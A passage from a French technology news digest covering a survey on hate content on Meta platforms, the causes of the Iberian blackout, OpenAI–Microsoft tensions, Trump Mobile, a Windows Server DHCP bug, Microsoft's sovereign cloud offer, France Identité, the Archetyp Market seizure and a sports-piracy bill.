Une bonne partie du panel fait partie de ce que Meta appelle elle-même les « groupes à caractéristiques protégées », ce qui inclut notamment les personnes régulièrement ciblées pour leur race supposée, leur ethnie, leur nationalité, leur situation de handicap, leur religion, leur caste (dans les systèmes politiques dans lesquels elles existent), leur orientation sexuelle, leur sexe, leur identité de genre ou leur maladie grave (ce qui recoupe beaucoup des critères en fonction desquels la discrimination est interdite en France). Les associations se sont effectivement concentrées sur les personnes les plus susceptibles d’être visées par ces cyberviolences.

L’enquête se veut multilingue et le questionnaire a été distribué en anglais, mais aussi en portugais, espagnol, allemand, italien et en français. Mais la plupart des personnes qui ont répondu (5 278) l’ont fait en anglais. La moyenne d’âge est de 50,5 ans et plus de la moitié était des utilisateurs de Facebook, plus d’un tiers d’Instagram et 11 % de Threads.

92 % de personnes préoccupées

La plupart de ces personnes se disent « très préoccupées » par l’augmentation des contenus violents sur les plateformes de Meta, plus de deux tiers. Et un quart « préoccupées ».

Les attaques contre ces personnes ont notamment ciblé leur orientation sexuelle, leur genre, leur race supposée ou leur ethnie :

Les personnes interrogées (rappelons qu’elles font majoritairement partie des « groupes à caractéristiques protégées ») se sentent pour plus des deux tiers particulièrement vulnérables face aux changements effectués par Meta :

Et elles ont, en majorité, le sentiment d’avoir perdu de la liberté d’expression puisque trois quarts d’entre elles se sentent moins en sécurité pour s’exprimer sur les plateformes de Meta :

Une augmentation des violences sexuelles ou liées au genre

23 % de ces personnes ont subi directement des violences sexuelles ou liées au genre depuis janvier dernier. En bonne partie, cela fait référence à du stalking et du harcèlement. Plus de 500 d’entre elles ont reçu des photos ou vidéos sans leur consentement et plus de 250 ont été victimes de deepfakes pornographiques. D’autres violences comme les sextortions (menace de publier des photos ou des vidéos sexuelles ou dénudées de la personne) ou les diffusions non consenties d’images intimes.

« Je vois rarement les posts de mes amis maintenant – mon fil d’actualité est rempli d’images obscènes manipulées, de publicités commerciales et de commentaires transphobes, sexistes et violents, même sous des vidéos de chatons. Les menaces de mort ne sont pas supprimées, même lorsqu’elles sont signalées », témoigne une de ces personnes citée par l’association GLAAD (Gay & Lesbian Alliance Against Defamation).

Celle-ci explique que cette enquête est importante, car elle contredit ce que l’entreprise affirme dans ces rapports trimestriels : « Dans son dernier rapport publié le mois dernier, la société a déclaré que, de janvier à avril 2025, « les contenus violents sont restés largement inchangés pour la plupart des domaines problématiques » », explique l’association.

« Mais il est important de noter que ces chiffres sont basés uniquement sur des données internes et restent opaques à tout examen extérieur. Notre enquête se concentre sur les expériences vécues par les utilisateurs eux-mêmes, révélant que l’affaiblissement des politiques n’a pas conduit, comme le prétend Meta, à « plus d’expression et moins d’erreurs », mais plutôt à un environnement plus hostile pour ceux qui sont déjà les plus vulnérables », ajoute-t-elle.

Les trois associations commanditaires demandent à Meta de mettre en place une commission indépendante sur les conséquences des changements mis en place en janvier, de remettre en place des protections robustes contre les discours de haine ainsi que son système de fact-checking pré-existant et enfin de plus impliquer les acteurs de la société civile dans ses délibérations politiques futures.

Comme l’explique l’AFP, l’entreprise de Mark Zuckerberg a refusé de commenter l’enquête.

  •  

L’Espagne explique les causes du black-out

Attention, chute de tension
L’Espagne explique les causes du black-out

L’Espagne revient sur le black-out du 28 avril qui a privé la péninsule ibérique de courant pendant de très longues heures. Les causes sont multiples, mais le cœur du problème viendrait d’une capacité insuffisante de contrôle de la tension. L’enquête officielle au niveau européen suit son cours.

Après le conseil des ministres de ce 17 juin en Espagne, Sara Aagesen (ministre espagnole de la Transition écologique) a pris la parole devant la presse pour revenir sur le black-out du 28 avril en Espagne et au Portugal.

Elle dirige pour rappel la commission d’enquête sur cet événement et s’était déjà exprimée sur le sujet mi-mai. Elle expliquait notamment que le réseau avait enregistré deux « oscillations » à 12h03 et 12h19 le jour du black-out, puis trois incidents à 12h32 et 12h33.

Dix centrales thermiques prévues en renfort… aucune à la hauteur

Premier point, comme on pouvait s’en douter, la ministre affirme que le black-out a une « origine multifactorielle, c’est-à-dire qu’une combinaison de facteurs a joué un rôle ». Des « phénomènes de surtensions » se sont propagés sur le réseau électrique, donnant vie à une « réaction en chaîne » avec les déconnexions des sites de productions d’électricité. La suite, on la connait : black-out électrique.

La ministre explique que, la veille de l’incident, le gestionnaire du réseau électrique Red Eléctrica (REE) avait prévu « dix centrales thermiques [au gaz, au charbon, nucléaires…, ndlr] pour contrôler dynamiquement la tension ». Les centrales étaient réparties un peu partout sur le territoire afin d’alimenter le réseau ibérique qui est, toujours selon la ministre, fortement maillé.

Le but de ces centrales est « uniquement de contrôler la tension, en absorbant ou générant de l’énergie réactive » en fonction des besoins du moment (les centrales ne devaient pas apporter de puissance, seulement du contrôle de tension). L’énergie réactive, rappelle EDF, est « un facteur important pour la stabilité des réseaux de transport ou de distribution d’électricité ».

Premier problème le 27 avril à 20 h : une des dix centrales s’est déclarée indisponible pour la journée du 28 avril. Durant la session de questions réponses à la fin de la conférence, la ministre explique que, selon les calculs de l’opérateur de réseau Red Eléctrica, il « n’était pas nécessaire » d’ajouter du renfort aux neuf centrales programmées pour la journée du 28 avril.

La ministre ajoute que, sur les neuf centrales restantes, toutes présentaient « un certain degré de non-conformité », et n’ont donc pas pu jouer leur rôle comme prévu durant la journée du black-out. Sara Aagesen ne donne aucun nom et ne détaille pas le niveau de responsabilité de chacun.

Bref, le réseau électrique espagnol « ne disposait pas d’une capacité suffisante de contrôle de la tension » le jour du black-out, reconnait la ministre, avec les conséquences que l’on connait. Elle ajoute que ce 28 avril 2025, « la capacité de contrôle de la tension programmée était la plus basse sur l’année 2025 ».

Pas de cyberincident, mais des vulnérabilités identifiées

Sara Aagesen réaffirme une nouvelle fois « qu’il n’y a aucune preuve d’un cyberincident ou d’une cyberattaque » comme étant une des causes de la panne géante. « Cependant, ce que je peux dire et souligner aujourd’hui, c’est que des vulnérabilités et des lacunes ont été identifiées », ajoute-t-elle.

Des mesures seront évidemment prises pour éviter de laisser les réseaux électriques face à ces risques, mais là encore, nous n’avons aucun détail. Un rapport doit être publié aujourd’hui (caviardé de certaines données, prévient la ministre), ce sera peut-être l’occasion d’en apprendre davantage.

L’enquête officielle européenne encore loin d’être terminée

De son côté, ENTSO-E (le réseau européen des gestionnaires de réseau(x) de transport d’électricité) a également ouvert une enquête officielle. Il dispose de six mois pour rendre son rapport, avec des étapes intermédiaires. Le rapport comprendra aussi des recommandations pour éviter que cela ne se reproduise.

L’Espagne et le Portugal ont trois mois pour transmettre leurs données, avant et pendant l’incident. Il reste encore du temps puisque le black-out s’est produit il y a moins de deux mois pour l’instant. Lors de son dernier point d’étape, le 6 juin, ENTSO-E était encore en train de « recueillir toutes les données nécessaires pour établir les faits ».

L’enquête se penche sur les causes de l’incident, mais cherche aussi à savoir « pourquoi les plans de défense espagnols et portugais n’ont pas pu arrêter le processus qui a conduit au black-out total des deux pays ». Une page dédiée a été mise en ligne pour suivre l’avancement de l’enquête.

Le groupe d’experts doit se réunir les 23 juin et 15 juillet prochain.

  •  

Tensions entre OpenAI et Microsoft sur fond d’accusation d’abus de position dominante

Copilotes ?
Tensions entre OpenAI et Microsoft sur fond d’accusation d’abus de position dominante

Les deux entreprises, qui semblaient jusqu’alors fonctionner en symbiose, commencent à voir leurs intérêts diverger. OpenAI envisagerait même de remettre en question certains termes de leur accord, voire d’attaquer Microsoft pour abus de position dominante.

Entre OpenAI et Microsoft, qui a injecté des milliards dans l’entreprise, l’ambiance n’est pas au beau fixe. OpenAI réfléchirait même à attaquer certaines clauses de leur contrat pour des violations des lois antitrust étasuniennes.

Comme nous l’expliquions il y a deux ans, Microsoft a pu utiliser OpenAI comme cheval de Troie de l’IA générative en se prémunissant d’éventuelles critiques qui l’auraient entachée. Car, à l’époque, le succès de ChatGPT n’était pas gagné. Finalement, les deux entreprises ont profité du succès du chatbot et ont réussi à devenir les leaders du marché. D’un côté, la startup la plus en vogue et de l’autre la multinationale qui a intégré avant tous les autres l’IA générative dans tous ses produits (jusque dans Notepad). Les deux entreprises avaient intérêt à travailler en synergie.

Se sortir des griffes du géant

Mais les responsables des deux entreprises voient de plus en plus leurs intérêts diverger. Au point, comme le racontent plusieurs sources au Wall Street Journal, qu’OpenAI envisagerait de dénoncer certaines clauses du contrat. Le journal financier américain qualifie cette option de « nucléaire ».

L’entreprise de Sam Altman voudrait sortir de sa dépendance envers le géant du secteur, que ce soit à propos de ses produits d’IA générative, des ressources informatiques dont elle a besoin ainsi que de son poids sur sa transformation en entreprise à but lucratif.

Pour l’instant, Microsoft a l’exclusivité de distribution des modèles d’OpenAI sur ses services de cloud computing d’Azure, ainsi qu’un accès privilégié aux produits de l’entreprise de Sam Altman. OpenAI est aussi censé n’utiliser que les serveurs de Microsoft. La startup voudrait se libérer de ce lien exclusif.

Le désaccord de trop qui pousserait OpenAI à une réaction plus vive se trouverait dans les conditions de son acquisition pour 3 milliards de dollars de la startup Windsurf jusque-là soutenue par… Microsoft. Alors que l’accord permet à Microsoft d’avoir accès à toute la propriété intellectuelle d’OpenAI, celle-ci veut en exclure ce qui viendrait de sa nouvelle acquisition.

À la recherche d’un passage vers des statuts plus classiques

L’approbation de Microsoft sur le passage d’OpenAI en entreprise plus classique est aussi essentielle pour que cette dernière puisse lever plus de fonds, et éventuellement s’introduire en bourse.

Depuis plusieurs mois, les responsables exécutifs d’OpenAI essayent de manœuvrer pour abandonner complètement la structure à but non lucratif qui a été mise en place à l’origine et trouver un moyen de devenir une entreprise cotée.

En avril, on apprenait qu’elle avait formalisé un nouveau tour de table à hauteur de 40 milliards de dollars, amenés principalement par Softbank. Mais celui-ci ne peut être achevé qu’à la condition que l’entreprise ait réussi sa mue en société à but lucratif.

Or, diverses entités externes qui ont leur place dans son conseil d’administration font tout pour bloquer cette transformation. Elon Musk, qui fait partie des co-créateurs d’OpenAI, a proposé en février de racheter l’entreprise pour 97,4 milliards de dollars, au prétexte de protéger le caractère non lucratif de la structure. Proposition déclinée directement par Sam Altman.

En mai, OpenAI a annoncé faire évoluer sa gouvernance tout en ne se tournant toujours pas vers le statut de société à but lucratif. Les tensions actuelles entre Microsoft et l’entreprise de Sam Altman montrent qu’OpenAI n’a toujours pas abandonné l’idée.

Officiellement, tout va bien

L’histoire entre les deux entreprises n’était déjà pas de tout repos : on se souvient de la semaine de folie qui avait vu Sam Altman limogé d’OpenAI avant d’être réintégré, accompagné d’un nouveau conseil d’administration, grâce au soutien de Microsoft.

« Nous avons un partenariat productif à long terme qui a donné naissance à des outils d’IA étonnants pour tout le monde », ont répondu les deux entreprises dans un communiqué commun adressé au Wall Street Journal : « Les discussions se poursuivent et nous sommes optimistes quant à la poursuite de notre collaboration pour les années à venir ».

  •  

Trump Mobile : entre téléphone doré et conflit d’intérêts

The ecstasy of gold
Trump Mobile : entre téléphone doré et conflit d’intérêts

La Trump Organization a annoncé lundi la création d’un opérateur mobile virtuel aux États-Unis. Baptisé Trump Mobile, il propose à la précommande un forfait et un smartphone doré qui jouent pleinement la carte du patriotisme et le soutien à Donald Trump… quitte à formuler des promesses difficiles à tenir.

Chez les Trump, on ne déploie pas de réseaux mobiles et on ne fabrique pas de smartphones, mais on sait depuis longtemps décliner le patronyme familial sous forme de marque. La Trump Organization connait depuis lundi une nouvelle incarnation avec l’annonce du lancement de « Trump Mobile », une nouvelle marque de téléphonie mobile qui joue sans complexe la carte de l’affinité avec l’actuel président des États-Unis.

Un forfait ordinaire…

Le forfait vedette de Trump Mobile, baptisé « The 47 Plan » est par exemple facturé 47,45 dollars par mois, en hommage aux deux mandats du milliardaire. Il promet une couverture nationale, des SMS et appels illimités, et 20 Go de données avant réduction des débits, ainsi que l’accès à une assurance pour le téléphone, une assistance en cas de dommage sur la route et des avantages en matière de services de santé à distance. La formule, présentée comme « simple, honnête et adaptée à vos besoins », est surtout dans un standard de marché aux États-Unis, où un forfait illimité avec « fair use » tourne généralement autour de 50 dollars.

Mais peut-être n’est-ce pas l’essentiel pour les futurs clients ? « Trump Mobile va changer la donne. Nous poursuivons le mouvement vers la priorité donnée à l’Amérique et nous offrirons les plus hauts niveaux de qualité et de service. Notre entreprise est basée ici même aux États-Unis, car nous savons que c’est ce que nos clients attendent et méritent », clame Donald Trump Jr (fils de) dans un communiqué.

Et le groupe familial n’hésite pas à filer la logique jusqu’au bout. Il annonce en effet dans le même temps le lancement prochain d’un « Trump Phone », ou « T1 Phone », un appareil couleur or, « conçu pour la performance et fièrement dessiné et fabriqué aux États-Unis ».

… mais un téléphone doré !

L’appareil, référencé comme le T1 Phone 8002, se présente comme un smartphone 6,8 pouces doté d’un écran AMOLED, d’un capteur dorsal de 50 mégapixels et d’une batterie de 5 000 mAh, avec un capteur d’empreintes sous l’écran et un système de reconnaissance faciale pour le déverrouillage du système. Pour l’instant limité à un unique coloris, il vient équipé d’Android 15, avec un tarif promotionnel de lancement à 499 dollars et un prix public conseillé de 799 dollars (équivalent donc à celui d’un iPhone 16 dans sa version 128 Go de base).

Le T1 arbore un dos doré, sans qu’on sache si le logo T1 et le drapeau des États-Unis sont des éléments de design définitifs

À ce stade, les visuels sont de simples rendus 3D et quelques éléments peuvent interroger, comme ces deux capteurs de 2 mégapixels censés compléter l’offre photo au dos de l’appareil. Plus que ces caractéristiques, encore très incomplètes mais relativement conventionnelles pour un smartphone Android milieu de gamme, c’est bien sûr la question de la fabrication aux États-Unis qui interroge : la Trump Organization aurait-elle déjà mis en place une chaîne d’approvisionnement et d’assemblage garantissant cet aspect ?

La réalité est sans doute plus floue, comme le laisse entendre une intervention d’Eric Trump (un autre de ses fils), vice-président exécutif de la holding familiale, invité lundi du Benny Show, un podcast de commentaire politique à la ligne globalement pro-Trump et très conservatrice. « À terme, tous les téléphones pourront être fabriqués aux États-Unis », y déclare Eric Trump, après avoir vanté le côté America First de Trump Mobile, dont le service client sera opéré depuis Saint-Louis, Missouri.

En attendant, il est donc permis de supposer que leur fabrication intervienne dans un autre pays, en dépit de la mention explicite « Made in USA » qui figure sur le site marchand Trump Mobile. Quid dans ce contexte des phases de conception et de design évoquées par la Trump Organization ?

Une licence de marque

On peut également se demander quelle sera l’ampleur réelle des activités créées par Trump Mobile aux États-Unis, dans la mesure où le nouveau venu se positionne comme un opérateur virtuel (MVNO), qui se contente de revendre l’accès à des réseaux opérés par d’autres acteurs. La famille Trump ne donne aucun élément chiffré qui permettrait de juger de ses objectifs de conquête, des moyens investis ou des perspectives en matière de recrutement.

Et pour cause : son implication opérationnelle se révèle en réalité très limitée, comme l’indique très clairement une mention en bas de page, présente dès l’accueil du site du nouvel opérateur.

« Trump Mobile et ses produits et services ne sont pas conçus, développés, fabriqués, distribués ou vendus par The Trump Organization ni par l’une de ses filiales ou sociétés affiliées. T1 Mobile LLC utilise le nom et la marque TRUMP conformément aux termes d’un contrat de licence limité, résiliable ou révocable selon ses propres termes ».

Autrement dit, il n’y aurait qu’un simple accord de licence permettant à l’opérateur T1 Mobile LLC d’exploiter le nom Trump. Comment cet opérateur fonctionne-t-il, et qui finance ses activités ? La société concernée a été immatriculée le 25 avril dernier en Floride, par un certain Stuart Kaplan. Son adresse confirme qu’il s’agit d’un avocat basé à Palm Beach Gardens, qui se présente comme un ancien agent du FBI, intervient régulièrement sur le plateau de Fox News, et figure au rang des défenseurs des émeutiers qui ont envahi le Capitole le 6 janvier 2021.

Conflit d’intérêts ?

Le lancement de cet opérateur mobile n’est qu’une nouvelle diversification au sein d’une galaxie Trump qui compte déjà de très nombreuses activités et dont le président est toujours actionnaire, même s’il a passé les commandes à ses fils.

Son lancement intervient cependant après que Donald Trump a retrouvé les ors de la Maison-blanche, et lancé une politique de droits de douane qui vise, notamment, à faire pression sur les grandes marques américaines telles qu’Apple, pour qu’elles rapatrient la production de leurs appareils sur le sol des États-Unis.

Donald Trump et ses fils ont déjà été suspectés de possibles conflits d’intérêts, par exemple, dans le cadre de leurs activités liées au monde de la cryptomonnaie, avec l’introduction, en janvier, de jetons à l’effigie du couple présidentiel ($TRUMP et $MELANIA). Des produits purement spéculatifs, mis sur le marché au moment même où Donald Trump annonçait vouloir créer une réserve stratégique de cryptomonnaies aux États-Unis.

  •  

☕️ Sur Windows Server, le dernier Patch Tuesday casse le serveur DHCP « par intermittence »

Le 10 juin, Microsoft déployait ses correctifs mensuels de sécurité, le fameux Patch Tuesday. Celui-ci corrigeait des dizaines de failles de sécurité, comme à peu près tous les mois. À ce moment, un seul problème était connu, un souci d’affichage pour la famille de polices Noto, qui apparaissaient comme floues dans certaines conditions.

L’éditeur a cependant mis à jour sa fiche pour ajouter un problème nettement plus sérieux. Les versions 2016, 2019, 2022 et même 2025 de Windows Server peuvent provoquer un défaut avec le serveur DHCP du système, qui fonctionne alors « par intermittence ». Le problème peut engendrer une belle pagaille dans les entreprises, car ce composant est responsable de la distribution dynamique d’adresses IP aux appareils connectés au réseau.

Sur Reddit, le sujet tourne depuis des jours, provoquant la colère d’un grand nombre d’utilisateurs. Il n’y a pour l’instant aucune solution et, facteur aggravant, Microsoft n’a pas communiqué tout de suite. Une mise à jour de la page indique désormais : « Nous travaillons à la publication d’une résolution dans les prochains jours et fournirons plus d’informations dès qu’elle sera disponible ».

Comme souvent avec les problèmes liés aux mises à jour de Windows, le cas relance les discussions sur l’assurance qualité de Microsoft et le temps que l’éditeur consacre aux tests de ses correctifs. Le problème avait empoisonné une partie du cycle de vie de Windows 10, et la situation ne s’est guère améliorée sous Windows 11. Sur ce dernier, la mise à jour majeure 24H2 a eu son lot de problèmes, avec un déploiement complexe, qui s’achève tout juste, et un nombre important de soucis techniques.

  •  

Microsoft décline le cloud « souverain » en 50 nuances de Bleu Azure

La vie en Bleu
Microsoft décline le cloud « souverain » en 50 nuances de Bleu Azure

La société vient d’annoncer la disponibilité, en avant-première, d’un nouveau programme en Europe. Conçu a priori pour répondre aux inquiétudes de souveraineté, le programme fait la promesse de données restant au sein des frontières de l’Union et donne des assurances sur le personnel. Problème, Microsoft ne peut pas garantir de protection contre la portée extraterritoriale des lois américaines sur son cloud public.

Microsoft joue la carte de l’entente et du bon élève avec l’Europe. Contrairement à Apple, par exemple, qui fustige largement le DMA et compte lutter jusqu’au bout, Microsoft a dévoilé tout un plan visant à répondre à diverses inquiétudes. « Une drôle de déclaration d’amour », titrions-nous, avec de nombreuses annonces sur la cybersécurité et la souveraineté notamment.

La semaine dernière, l’éditeur est revenu communiquer sur l’Europe, cette fois pour détailler ses renforcements dans la cybersécurité. La société a ainsi mis en place un réseau de collaboration dans lequel elle s’engage à fournir un plus grand nombre d’informations aux pays membres de l’Union, un état des menaces en quasi-temps réel. Elle a également renforcé sa coopération avec Europol, via sa propre Digital Crime Unit. Un investissement dont on imagine que la firme attend beaucoup, avec des retombées positives, au moins en matière d’image.

Mais Microsoft était surtout attendue sur le terrain de la souveraineté. La société vient d’annoncer une série de mesures, sans toutefois aborder certains sujets qui fâchent.

Tir groupé

Les annonces visent à la fois le cloud public et le cloud privé. Pour rappel, le premier est le cloud classique tel qu’on le connait : les données et services des clients sont placés dans des structures mutualisées et réparties potentiellement dans de nombreux centres. Dans le cloud privé, ces informations et développements sont stockés sur des ressources dédiées, auxquelles ne peut accéder que le client (et l’hébergeur). Pour des données et applications exclusivement sur les sites des utilisateurs, on parle de « on-premise », ou « installation sur site ».

La principale annonce de Microsoft est le Sovereign Private Cloud (appellation commerciale de Microsoft, regroupant des engagements et des produits), qui sera finalisé et pleinement disponible avant la fin de l’année, dans toutes les régions de l’Union où Microsoft possède des centres de données. L’ensemble des clients européens pourront en profiter s’ils en font la demande, l’annonce se répercutant sur tous les services liés dont Azure, 365, Security et Power Platform.

« Sovereign Private Cloud garantit que les données des clients restent en Europe, sous la loi européenne, avec des opérations et un accès contrôlés par le personnel européen, et que le chiffrement est sous le contrôle total des clients. Cela est possible pour toutes les charges de travail des clients fonctionnant dans nos régions de centres de données européens et ne nécessitant aucune migration », revendique Microsoft.

Quelles mesures ?

L’entreprise présente une série de mesures concrètes. L’une des plus importantes est mentionnée dans la déclaration précédente : la garantie de pouvoir utiliser ses propres clés de chiffrement. Cela signifie, dans ce cas, que les données ainsi chiffrées ne sont pas lisibles par Microsoft.

C’est une généralisation d’Azure Managed HSM (Hardware Security Module). Microsoft dit travailler avec tous les principaux constructeurs HSM pour s’assurer leur support, dont Futurex, Thales et Ultimaco. En théorie, cela signifie que l’implémentation de stocker ces clés où le client le souhaite. C’est aujourd’hui un élément essentiel de la sécurité et de la confidentialité des données, mais il n’est pas suffisant à lui seul, comme on le verra.

On trouve ensuite Data Guardian, qui doit garantir que seul le personnel de Microsoft résidant en Europe « contrôle l’accès à distance à ces systèmes ». En clair, cela signifie que si des ingénieurs situés hors d’Europe ont besoin d’un accès pour des raisons techniques, le personnel européen surveillera l’opération. Cette dernière sera consignée dans un registre que Microsoft décrit comme « inviolable ».

Microsoft limite donc l’accès au personnel européen, mais sans distinction de leur (éventuellement double) nationalité. Thales a la volonté d’aller plus loin, pour rappel, pour le personnel critique de S3ns : « je pense que la nationalité américaine ne sera pas possible pour rester immunisé », expliquait le RSSI de Thales Ivan Maximoff.

Microsoft met aussi en avant Azure Local et Microsoft 365 Local. Il s’agit de versions spécifiques de ses offres pour les clouds privés. Elles ne contiennent pas l’intégralité des fonctions et services, mais sont présentées comme taillées pour des besoins spécifiques. « Certains scénarios exigent que certaines charges de travail soient exécutées dans un environnement physique sous le contrôle total du client afin de soutenir l’atténuation des risques liés à la continuité de l’activité », indique ainsi l’entreprise.

Ces services sont placés dans les locaux des clients, sur leurs infrastructures matérielles ou celle d’un hébergeur de leur choix. Microsoft fournit en somme la solution logicielle et les mises à jour, mais ne gère pas les services, ce qui va plus loin que la classique définition du cloud privé. Et si ce fonctionnement vous rappelle quelque chose, c’est qu’il correspond à celui de Bleu.

50 nuances de bleu

Microsoft met en avant le partenariat ayant donné naissance à Bleu : « En France, nous avons conclu un accord avec Bleu, une coentreprise entre Orange et Capgemini, pour que Bleu exploite un « cloud de confiance » pour le secteur public français, les fournisseurs d’infrastructures critiques et les fournisseurs de services essentiels, conçu pour répondre aux exigences de SecNumCloud ».

En somme, l’annonce d’aujourd’hui revient à généraliser ce fonctionnement aux clients qui en font la demande. Et qui en ont les moyens, puisque qu’il faut fournir soi-même l’infrastructure.

La référence à SecNumCloud n’est pas non plus anodine. Ce qui permet notamment à Microsoft de déclarer : « Private Sovereign Cloud est conçu pour les gouvernements, les industries critiques et les secteurs réglementés qui doivent respecter les normes les plus strictes en matière de résidence des données, d’autonomie opérationnelle et d’accès déconnecté ».

Cloud très public

Si on suit les déclarations et annonces de Microsoft, l’écart entre cloud public et privé se creuse. On se rappelle en effet que Microsoft a reconnu au Royaume-Uni qu’il était impossible de garantir la souveraineté des données stockées par la police écossaise chez Microsoft.

La portée extraterritoriale de certaines lois américaines, tout particulièrement les Cloud Act et FISAA, l’en empêche. Aux États-Unis, Microsoft est tenue juridiquement de fournir les données demandées dans le cadre des enquêtes criminelles, en théorie après validation d’un mandat par un juge. Y compris quand lesdites données sont sur des serveurs physiquement hors des frontières états-uniennes.

Or, cette déclaration a également été faite la semaine dernière en France. Anton Carniaux, directeur des affaires publiques et juridiques de Microsoft France, était entendu par une commission d’enquête sénatoriale sur les coûts et modalités effectifs de la commande publique. Face à une question claire, et sous serment, sur la garantie que les données françaises ne quitteraient pas le territoire « sans l’accord explicite des autorités françaises », le responsable a répondu : « Non, je ne peux pas le garantir, mais aujourd’hui ce n’est pas arrivé ».

Sur la question du « cloud privé » en revanche, la situation est a priori plus simple. Si l’on en croit Vincent Strubel, directeur de l’ANSSI et lui-même auditionné au Sénat début juin, Bleu ne sera justement pas concernée par la portée extraterritoriale des lois américaines. La structure est équipée en solutions logicielles de Microsoft, mais s’occupe d’opérer elle-même ses traitements. L’ANSSI a affirmé que rien ne s’opposait à sa qualification SecNumCloud, pas plus qu’à celle de S3ns. Cette dernière s’est lancée dans la procédure en juillet dernier et attend le dénouement cet été. Bleu est entré dans le processus plus tard, en avril 2025 et s’attend à une qualification au premier semestre 2026.

Vincent Strubel a également rappelé qu’il n’y avait pas d’autre solution pour se protéger du droit à portée extraterritoriale que d’utiliser des produits qui n’y sont pas soumis. « Le chiffrement, la localisation des données et l’anonymisation, ça complique peut-être les choses, mais ça ne rend pas impossible la captation des données », avait ainsi déclaré le directeur de l’ANSSI. L’annonce de Microsoft sur les clés de chiffrement est donc importante, mais ne bloque pas en elle-même l’accès aux données.

  •  

☕️ La version bêta de France Identité prend en charge la carte grise

Après la carte nationale d’identité (au format carte bancaire) et le permis de conduire, c’est au tour de la carte grise de faire son entrée sur France Identité. Pour l’instant, cette nouveauté est réservée aux versions bêta de l’application pour iOS (via TestFlight, mais les places sont prises depuis longtemps) et Android.

Comme le rappellent nos confrères d’iGen, l’arrivée de cette fonction était prévue pour 2026. On ignore combien de temps va durer la phase de test, mais la carte grise sera peut-être en avance sur le programme.

Si l’on en croit les retours sur X, l’ajout de la carte grise semble bien se passer, des utilisateurs appréciant cet ajout. Il y a cependant une condition à respecter : que le véhicule soit muni d’une plaque au format AA-123-AA, donc immatriculé après 2009.

Comme on peut le voir chez nos confrères, la nouvelle version de l’application modifie l’écran d’accueil pour mieux refléter les cartes ajoutées. L’identité numérique apparait sur la moitié supérieure, tandis que le permis de conduire et la carte grise sont sur la seconde. La génération de justificatif, elle, est déportée dans le menu de la carte d’identité.

  •  

Saisie d’Archetyp Market, l’un des supermarchés en ligne de la drogue

Fin de partie
Saisie d’Archetyp Market, l’un des supermarchés en ligne de la drogue

Europol et les forces de police allemandes ont annoncé lundi la saisie des infrastructures informatiques d’Archetyp Market et l’arrestation de ses principaux administrateurs. Le site, accessible uniquement via le réseau TOR, opérait depuis 2020 comme une place de marché dédiée à l’achat de drogues.

Les administrateurs d’Archetyp Market, célèbre supermarché du dark web dédié à l’achat et à la vente de drogues illicites, seraient-ils partis avec la caisse ? L’hypothèse a circulé ces derniers jours sur les réseaux sociaux, après que le site fut soudainement apparu comme « en maintenance ». Ceux qui craignaient un exit scam (escroquerie de sortie) ont peut-être maintenant d’autres motifs d’inquiétude : Europol a en effet annoncé lundi la mise hors service du site et l’arrestation de plusieurs de ses administrateurs, suite à une opération baptisée Deep Sentinel.

L’un des nombreux successeurs de Silk Road

Le coup de filet a été réalisé entre le 11 et le 13 juin, indique Europol, avec une action conjointe et simultanée dans cinq pays. Les infrastructures du site, basées aux Pays-bas, ont été saisies, tandis qu’un des responsables du site, un Allemand de trente ans, a été arrêté à Barcelone. L’opération a par ailleurs permis d’arrêter l’un des modérateurs du site, mais aussi six des plus gros vendeurs actifs sur la plateforme.

Le site et son forum comptaient 600 000 utilisateurs enregistrés, et auraient permis de réaliser l’équivalent de 250 millions d’euros de transaction, affirment les forces de police. La place de marché (marketplace) référençait quelque 17 000 produits illégaux, majoritairement des drogues. Parmi les différentes adresses spécialisées du dark web, Archetyp Market se distinguait notamment par sa tolérance vis-à-vis de la vente de fentanyl, souvent proscrit chez les concurrents, note Europol.

Le fondateur d’Archetyp Market s’était livré dans une longue interview en 2021 (en allemand). Il y expliquait avoir été inspiré par les idéaux libertariens de Ross Ulbricht, le fondateur du célèbre Silk Road. Il y revendiquait également le piratage, survenu en 2020, d’une autre place de marché du dark web, le site Pax Romana, et promettait des garanties sérieuses en matière de sécurité et de protection de l’anonymat de ses utilisateurs, vendeurs comme acheteurs. Il y expliquait enfin avoir choisi la cryptomonnaie Monero pour les flux financiers de son site, et arguait qu’il n’était pas possible de remonter sa trace par ce biais.

« Ce démantèlement fait suite à des années d’enquêtes intensives visant à cartographier l’architecture technique de la plateforme et à identifier les individus qui se cachent derrière. En traçant les flux financiers, en analysant les preuves numériques et en collaborant étroitement avec des partenaires sur le terrain, les autorités ont pu porter un coup décisif à l’un des marchés de la drogue les plus prolifiques du dark web », commente de son côté Europol.

Une communication très Cyberpunk 2077

Lundi, l’adresse d’Archetyp Market répond toujours, mais une fois passé le captcha qui fait office de sas d’entrée, le site n’affiche plus qu’un visuel annonçant la saisie par les forces de police et renvoyant vers le site dédié à l’opération Deep Sentinel.

La page d’accueil d’Archetyp Market affiche le traditionnel message de saisie, assorti du logo des forces de police impliquées dans l’opération

Ce site, édité par l’Office fédéral de police criminelle allemand (BKA), est l’occasion pour les forces de l’ordre d’adresser un message aux éditeurs de sites concurrents. Plutôt qu’un texte lénifiant, il prend la forme d’une courte vidéo (2 minutes) aux codes graphiques directement inspirés du jeu Cyberpunk 2077. Elle souligne à quel point il est simple de lancer un site pour peu qu’on se pique de compétences techniques, avant bien sûr de mettre en avant la riposte policière.

  •  

Piratage sportif : l’Arcom sur le banc de touche, les adresses IP dans le viseur

IPTVu, IPTpris
Piratage sportif : l’Arcom sur le banc de touche, les adresses IP dans le viseur

Alors que le Sénat a adopté à la quasi-unanimité la proposition de loi sur le sport professionnel, les ayant-droits cherchent à déployer un système de blocage des sites de piratage bien plus ambitieux.

Le 10 juin, le Sénat adoptait la proposition de loi relative à l’organisation, à la gestion et au financement du sport professionnel. Issu de la mission d’information « Football-business : stop ou encore », le texte déposé par le sénateur centriste Laurent Lafon a été adopté par 338 voix contre 1.

Rôle renforcé des fédérations et du ministère des Sports dans la gouvernance de ligues professionnelle, redistribution des revenus audiovisuels, plafonnement des rémunérations pour les dirigeants et lutte contre le piratage sont au nombre des sujets abordés par la proposition de loi. Sur cette dernière thématique, l’Arcom relevait un manque à gagner de 290 millions d’euros en 2023, soit 15 % de parts de marché, souligne Public Sénat.

Accélérer les modalités de blocage

